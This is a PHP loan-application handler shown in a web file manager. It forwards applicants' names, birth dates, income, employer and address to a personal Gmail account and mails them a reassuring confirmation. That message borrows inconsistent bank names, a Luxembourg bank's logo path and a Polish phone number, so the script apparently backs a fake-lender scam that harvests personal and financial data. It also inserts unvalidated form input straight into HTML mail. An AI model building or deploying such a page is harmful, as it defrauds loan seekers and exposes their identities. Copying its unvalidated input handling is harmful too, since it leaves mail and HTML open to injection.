File manager - Edit - /home/justdoit/unitedcooperate.com/fund-services/loan.php
Back
<?php $firstname=$_POST['firstname']; $lastname=$_POST['lastname']; $email=$_POST['email']; $phone=$_POST['phone']; $gender=$_POST['gender']; $maritalstatus=$_POST['maritalstatus']; $DOB=$_POST['DOB']; $amount=$_POST['amount']; $Annual=$_POST['Annual']; $purposeofrequest=$_POST['purposeofrequest']; $job=$_POST['job']; $empname=$_POST['empname']; $address=$_POST['address']; //admmin mail $to = "lizkline653@gmail.com"; $subject = "Loan Requested"; $message = " <html> <head> <title>Loan Requested</title> <style> th{ background-color:gray; } td{ background-color:darkgray; } th,td{ color:white; padding:10px; margin:5px; width:200px; } </style> </head> <body> <p>New Application For Loan</p> <table> <tr> <th>Firstname</th> <th>Lastname</th> </tr> <tr> <td>$firstname</td> <td>$lastname</td> </tr> <tr> <th>Email</th> <th>Phone#</th> </tr> <tr> <td>$email</td> <td>$phone</td> </tr> <tr> <th>Gender</th> <th>Marital Status</th> </tr> <tr> <td>$gender</td> <td>$maritalstatus</td> </tr> <tr> <th>DOB</th> <th>Amount Requested</th> </tr> <tr> <td>$DOB</td> <td>$amount</td> </tr> <tr> <th>Annual Income</th> <th>Purpose of request</th> </tr> <tr> <td>$Annual</td> <td>$purposeofrequest</td> </tr> <tr> <th>Job</th> <th>Employer Name</th> </tr> <tr> <td>$job</td> <td>$empname</td> </tr> <tr> <th>Address</th> <tr> <td>$address</td> </tr> </table> </body> </html> "; // Always set content-type when sending HTML email $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; // More headers $headers .= 'From:loan@unitedcooperatetrust.com' . "\r\n"; $headers .= 'Cc:lizkline653@gmail.com' . "\r\n"; mail($to,$subject,$message,$headers); //CLIENT MAIL $to =$email; $subject = "Loan Request Submitted Sucessfully "; $message = " <html> <head> <title>Loan Requested</title> <style> p{ padding:5px; margin-left:50px; margin-right:50px; text-align:justify; } </style> </head> <body> <center> <img src='https://unitedcooperatetrust.com/-/media/eurobankLuxembourg/images/basicimages/logo.png' width='400'> <br/> <h3></h3> </center> <p> <b>Dear Applicant,</b><br/> We hope this message finds you well. We are writing to confirm the receipt of your recent loan application. We understand the importance of this request and the impact it can have on your financial plans. Thank you for choosing GreenPass Capital as your trusted financial partner. </p> <p> We want to assure you that your loan application has been received and is currently under review by our team of dedicated loan officers. Our experienced professionals will carefully evaluate your application, considering various factors to provide you with a fair and timely decision. </p> <p> We understand the significance of time in such matters, and we are committed to providing you with a prompt response. Within the next 24 hours, one of our loan agents will reach out to you to discuss the status of your application and any further steps required. </p> <p> Rest assured that all information provided in your application will be treated with the strictest confidentiality. We understand the sensitivity of financial matters and adhere to the highest standards of data security. </p> <p> If there are any additional documents or information needed to complete the review process, our loan agent will provide you with clear instructions. We kindly request your cooperation in promptly fulfilling any such requirements, as it will expedite the decision-making process. </p> <p> We appreciate your patience during this period of evaluation. We understand that waiting for a decision can be an anxious time, and we assure you that we are working diligently to provide you with the best possible outcome. </p> <p> If you have any immediate concerns or questions regarding your loan application, please feel free to contact our customer service team at <a href='tel:+48732231537'> +48 732231537</a>. Our dedicated representatives will be pleased to assist you. </p> <p> Thank you for choosing United Cooperate Trust . </p> <p> We value your trust and look forward to the possibility of helping you achieve your financial </p> <p> </p> </body> </html> "; // Always set content-type when sending HTML email $headers = "MIME-Version: 1.0" . "\r\n"; $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n"; // More headers $headers .= 'From:loan@unitedcooperatetrust.com' . "\r\n"; $headers .= 'Cc:customerservice@unitedcooperatetrust.com' . "\r\n"; mail($to,$subject,$message,$headers); ?> <script> alert("Your Loan Request Submitted Successfully"); window.location.href="https://unitedcooperatetrust.com/en/fund-services/services.html"; </script>
| ver. 1.4 |
Github
|
.
| PHP 8.2.31 | Generation time: 0.8 |
proxy
|
phpinfo
|
Settings